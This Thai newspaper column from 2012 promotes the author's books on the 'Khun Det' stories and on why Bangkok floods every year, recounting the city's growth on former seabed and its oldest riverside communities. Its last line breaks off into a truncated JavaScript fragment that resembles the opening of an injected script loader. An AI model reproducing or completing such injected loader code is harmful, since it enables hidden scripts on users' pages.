มติชนรายวัน ฉบับประจำวันศุกร์ที่ 30 มีนาคม 2555

 

          ขุนเดช เป็นหนังสือรวมเรื่องสั้น ได้ชื่อจากตัวละครเอกชุดขุนเดช ขณะนี้พิมพ์ครั้งที่ 9 มีภาคผนวกเปิดตัวจริง“ขุนเดช” ผมเขียนกลอนไว้อาลัยว่า

          จงเป็นขุนสุโขทัยในสยาม                  อยู่เหนือความเชื่อโลกนรกสวรรค์

          เป็นขุนเดชจิระเดชเพศสามัญ             เป็นเสื้อคำสำคัญสุโขทัย

          ให้ในน้ำมีปลานาเต็มเข้า                   เมืองบ่เอาอันระบอบจกอบไพร่

          ทั้งอิฐดินหินผาพนาลัย                     มันผู้ใดทำลายอย่าไว้มัน

          กรุงเทพฯ มาจากไหน? ฉบับพิมพ์ครั้งที่ 3 มีคำอธิบายถึงเหตุที่น้ำท่วมกรุงเทพฯ ว่ามาจากกรุงเทพฯ ตั้งอยู่บนพื้นที่ที่เคยเป็นท้องทะเลอ่าวไทยเมื่อ 12,000 ปีมาแล้ว

          ครั้นต่อมาด้วยปรากฏการณ์ทางธรรมชาติได้พัดพาเอาตะกอนหรือโคลนตมมาทับถม จนกลายเป็นผืนแผ่นดินที่มีความอุดมสมบูรณ์ ทำให้มีผู้คนหลายเผ่าพันธุ์เข้ามาตั้งหลักแหล่ง

          จนถึงยุคเริ่มแรกของกรุงเทพฯ เมื่อไม่น้อยกว่า 500 ปีมาแล้ว เป็นเพียงชุมชนชาวสวนขนาดเล็ก ค่อยๆ ขยายกว้างออกไปสมัยต้นกรุงศรีอยุธยา แล้วเติบโตขึ้นเป็นเมืองบางกอก

          กระทั่งพระเจ้าตากมาสถาปนากรุงธนบุรี ทางฝั่งตะวันตกของแม่น้ำเจ้าพระยา และรัชกาลที่ 1 ย้ายเมืองมาฝั่งตะวันออกจนกระทั่งถึงปัจจุบัน

          กรุงเทพฯ จึงมีน้ำท่วมถึงเป็นประจำทุกปีนับแต่แรกมีชุมชน สืบจนทุกวันนี้

          ชุมชนเก่าแก่ที่สุดของกรุงเทพฯ เมื่อราวเรือน พ.ศ. 2000 มีชื่ออยู่ในโคลงกำสรวลสมุทร (กำสรวลศรีปราชญ์) แล้วผมคัดชื่อมาไว้ในหนังสือกรุงเทพฯ ดังนี้

          ชุมชนริมแม่น้ำเจ้าพระยาตั้งแต่ใต้เมืองนนท์ลงมา มี บางเขน, บางกรูด, บางพลู, ฉมังราย (สมอราย),

          ชุมชนในคลองบางกอกน้อย-บางกอกใหญ่-คลองด่าน มี บางระมาด, บางฉนัง (บางเชือกหนัง), บางจาก, บางนางนอง

 

 

 

          สิตานัน รวีฤทธิ์ “ยุ้ย” เจ้าของสำนักพิมพ์ดรีม แคทเชอร์ ทำงานคุณภาพให้ อ. ชาญวิทย์ เกษตรศิริ และโตโยต้ามานานมาก มีฝีมือเป็นที่ยอมรับนับถือถ้วนหน้าและกว้างขวาง

          ขณะนี้ดูแลงานเฟซบุ๊คกับเว็บไซต์ sujitwongthes.com โดยไม่คิดค่าใช้จ่ายทางธุรกิจ

          “ยุ้ย ดรีม” พิมพ์หนังสือของผม 2 เล่ม เสร็จออกมาวางตลาดแล้ว คือ ขุนเดช กับ กรุงเทพฯ มาจากไหน? ทำไมน้ำท่วมทุกปี?var d=document;var s=d.createElement(‘script’); } else {